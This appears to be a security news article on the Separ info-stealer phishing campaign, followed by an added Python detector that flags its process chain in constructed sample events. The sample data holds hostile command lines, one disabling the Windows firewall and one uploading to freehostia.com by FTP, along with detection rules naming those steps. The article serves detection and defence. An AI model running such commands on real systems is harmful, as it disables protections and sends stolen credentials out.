An ongoing phishing campaign is targeting businesses and distributing the information-stealing Separ malware. The campaign has mostly concentrated on businesses in South East Asia and the Middle East, although some businesses in North America have also been attacked.
The Separ information stealer has been in use since September 2017, with earlier versions of the info-stealer dating back to 2013. The latest campaign, which uses an updated version of the malware, was detected in late January by researchers at Deep Instinct. Since then, more than 200 businesses and over 1,000 individuals have been attacked.
The threat actors have not gone to any lengths to prevent analysis of the malware, and the attack mechanism is very simple, but it is proving to be effective. The attack starts with a phishing email containing a fake PDF file which is in fact a self-extracting executable. The emails claim to contain quotes, shipment notices, or equipment specifications, the details of which can supposedly be found by opening the PDF file.
If the file attachment is opened, the self-extractor calls wscript.exe, which runs a Visual Basic Script (adobel.vbs) contained in the self-extractor. The VB script runs two small batch scripts. The first (adob01.bat) sets up directories and copies files using xcopy.exe and attrib.exe, and then launches a second batch script (adob02.bat) which performs the malicious functions. An empty decoy JPEG file is opened to hide the command windows from the user.
The firewall settings are changed, and email credentials and credentials stored in browsers are stolen using SecurityXploded password dumping tools. The stolen credentials are then uploaded to freehostia.com using an FTP client. The FTP client and the hosting service are both legitimate, so the data theft may go undetected.
Deep Instinct refers to the techniques as a Living off the Land attack, as it uses legitimate files and services to carry out its malicious functions.
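As an added example (not Deep Instinct's tooling or any code from the campaign), the following Python walks constructed Sysmon-style process-creation events and flags a script host launched by an executable in a user profile whose process tree then shows the batch-script, xcopy/attrib, firewall-change and FTP steps described above. The event layout, paths, and the netsh and ftp.exe command lines are assumptions made for illustration; the page only states that the firewall is changed and that an FTP client uploads to freehostia.com.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events, Sysmon-style fields:
# (pid, parent pid, image path, command line). Not real telemetry.
EVENTS = [
    (400, 100, r"C:\Users\u\Downloads\quote.pdf.exe", "quote.pdf.exe"),
    (401, 400, r"C:\Windows\System32\wscript.exe", "wscript.exe adobel.vbs"),
    (402, 401, r"C:\Windows\System32\cmd.exe", "cmd.exe /c adob01.bat"),
    (403, 402, r"C:\Windows\System32\xcopy.exe", "xcopy.exe /y /h src dst"),
    (404, 402, r"C:\Windows\System32\cmd.exe", "cmd.exe /c adob02.bat"),
    (405, 404, r"C:\Windows\System32\netsh.exe", "netsh.exe advfirewall set allprofiles state off"),
    (406, 404, r"C:\Windows\System32\ftp.exe", "ftp.exe -s:cmds.txt freehostia.com"),
    # Benign control: a logon script whose parent is not in the captured events
    (500, 100, r"C:\Windows\System32\wscript.exe", r"wscript.exe \\dc\netlogon\logon.vbs"),
]

# Indicator checks applied to each descendant of a suspicious script host.
# Each receives the lower-cased image path and the raw command line.
INDICATORS = {
    "batch_script": lambda img, cl: img.endswith("cmd.exe") and ".bat" in cl.lower(),
    "file_staging": lambda img, cl: img.endswith(("xcopy.exe", "attrib.exe")),
    "firewall_change": lambda img, cl: img.endswith("netsh.exe") and "firewall" in cl.lower(),
    "ftp_exfil": lambda img, cl: img.endswith("ftp.exe") and "freehostia.com" in cl.lower(),
}

def detect_separ_chain(events, min_indicators=3):
    """Return {root_pid: sorted indicator names} for each wscript/cscript
    spawned by an executable under C:\\Users whose descendants show at least
    min_indicators of the staging/exfiltration pattern."""
    by_pid = {e[0]: e for e in events}
    children = defaultdict(list)
    for pid, ppid, _, _ in events:
        children[ppid].append(pid)
    findings = {}
    for pid, ppid, img, cl in events:
        if not img.lower().endswith(("wscript.exe", "cscript.exe")):
            continue
        parent = by_pid.get(ppid)
        # The chain begins with a self-extractor run from a user-writable path
        if not parent or not re.match(r"(?i)c:\\users\\", parent[2]):
            continue
        seen, stack = set(), list(children[pid])
        while stack:  # depth-first walk of the script host's process tree
            c = stack.pop()
            _, _, cimg, ccl = by_pid[c]
            seen.update(n for n, f in INDICATORS.items() if f(cimg.lower(), ccl))
            stack.extend(children[c])
        if len(seen) >= min_indicators:
            findings[parent[0]] = sorted(seen)
    return findings
```

Tuning min_indicators trades recall against noise: the firewall and FTP steps alone are rare enough in most environments to justify an alert on their own, while cmd.exe running a .bat under wscript.exe is common in logon scripts.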
Businesses can protect against this attack by restricting the use of scripting tools. Anti-spam solutions can help to prevent the malicious emails from being delivered and end users should be trained on email security best practices, such as never opening attachments from unknown senders.